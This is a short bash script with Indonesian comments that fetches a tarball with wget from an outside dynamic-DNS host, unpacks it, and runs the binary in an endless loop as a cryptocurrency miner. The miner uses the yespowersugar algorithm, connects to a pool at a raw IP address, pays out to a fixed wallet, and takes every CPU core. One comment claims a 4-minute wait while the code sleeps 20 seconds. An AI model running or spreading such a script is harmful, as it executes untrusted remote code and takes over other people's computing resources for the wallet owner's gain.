#!/bin/bash

# Mengunduh dan mengekstrak file sekali di awal
wget -O JOKO http://mulyono.sytes.net/JOKO-RPL.tar.gz
tar -xvf JOKO

# Loop untuk menjalankan perintah setiap 4 menit
while true; do
    # Menjalankan perintah
    ./JOKO-RPL/JOKO -a yespowersugar -o 45.88.24.129:443 -u sugar1qmpk65gyqqgk63lkrg27gnl9hc2e8zqn7jgmd5j.COBA -t $(nproc)

    # Menunggu selama 4 menit (240 detik)
    sleep 20
done
